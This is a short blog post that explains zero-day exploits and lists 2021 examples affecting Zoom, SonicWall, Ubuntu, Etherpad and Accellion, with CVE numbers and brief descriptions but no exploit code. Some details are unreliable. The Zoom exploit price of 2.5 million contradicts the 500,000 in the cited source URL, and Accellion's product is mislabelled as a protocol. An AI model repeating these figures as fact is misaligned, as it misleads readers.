DEV Community

Cover image for What is a zero-day (0-day) exploit? Real-life examples
Grzegorz Piechnik
Grzegorz Piechnik

Posted on • Updated on

What is a zero-day (0-day) exploit? Real-life examples

We may encounter zero-day attacks from time to time on blogs writing about security. They are usually critical and hard to find even by experienced people. Ok, but what about the 0-day? The name comes from how many days the vulnerability is "in circulation." Consequently, these are vulnerabilities that have only just been discovered. Let's take a look at some recent attacks of the 0-day type.

Zoom

First, an application that almost everyone has used at least once- Zoom. The Vice portal informed its readers that there are as many as two vulnerabilities related to Zoom for sale on the black market. The first, is an RCE (remote code execution of arbitrary code) in a Windows application. Another bug involves a Mac OS client. No more details are available, however. The price tag for the Windows-related vulnerability is 2.5 million.

SonicWall's Email Security

FireEye revealed details of three vulnerabilities that allowed attackers to access corporate networks and install backdoors on employee devices. They include:

  • CVE-2021-20021 - unauthorized creation of administrative accounts,
  • CVE-2021-20022 - arbitrary file transfer after authentication,
  • CVE-2021-20023 - arbitrary reading of files after authentication.

In the technical description on FireEye's website, we can read that:

The adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files and emails, and move laterally into the victim organization's network," a technical write-up reads

https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html

Ubuntu

Security researcher Kevin Backhouse accidentally found two security flaws that, in combination, allow the creation of an administrator account without proper privileges on an Ubuntu system.

Initially, Kevin discovered that the system was vulnerable to a DoS attack. After closing the accounts-daemon process, one of the system services checks how many active users are on the system. The service didn't find anyone because accounts-deamon had been disabled earlier. As a result, the user was able to create a new administrator account to then use it to log in. A video explaining the finding in detail can be found below.

https://www.youtube.com/watch?v=8IjTq7GBupw

Etherpad

Etherpad is an extended online text editor. The person who found the bugs was Paul Gerste, a vulnerability researcher from SonarSource. In addition, he reported on his blog that the text editor has been bookmarked more than 10,000 times and has more than 250 available plug-ins. Thus, it enjoys enormous popularity. The security vulnerabilities Paul found have a "critical" status and in combination could have been used to take control of the server. The vulnerabilities in question are:

  • CVE-2021-34817 - XSS via one of the components,
  • CVE-2021-34816 - Argument injection. Allows privileged users to execute arbitrary code on the server by installing plugins from an attacker-controlled source.

Accellion File Transfer Protocol

The Assosiated Press news agency reported that as many as four vulnerabilities have been found in the file transfer protocol. The protocol in question is Accellion FTP. The 0-days found in it have been exploited against min: New Zealand and US banks. The bugs are available in the CVE dictionary. Here they are:

  • CVE-2021-27101 - SQL injection via Host header,
  • CVE-2021-27103 - SSRF via POST request,
  • CVE-2021-27102 - OS command execution via local network service call,
  • CVE-2021-27104 - OS command execution via crafted POST request.

Sources

https://portswigger.net/daily-swig/zero-day
https://www.accellion.com/company/press-releases/accellion-provides-update-to-fta-security-incident-following-mandiants-preliminary-findings/
https://nvd.nist.gov/vuln/detail/CVE-2021-27101
https://nvd.nist.gov/vuln/detail/CVE-2021-27103
https://nvd.nist.gov/vuln/detail/CVE-2021-27102
https://nvd.nist.gov/vuln/detail/CVE-2021-27104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34816
https://www.vice.com/en/article/qjdqgv/hackers-selling-critical-zoom-zero-day-exploit-for-500000
https://portswigger.net/daily-swig/zero-day-vulnerabilities-in-sonicwall-email-client-led-to-network-access-backdoors-installed
https://portswigger.net/daily-swig/vulnerabilities-in-ubuntu-desktop-enabled-root-access-in-two-simple-steps

Top comments (0)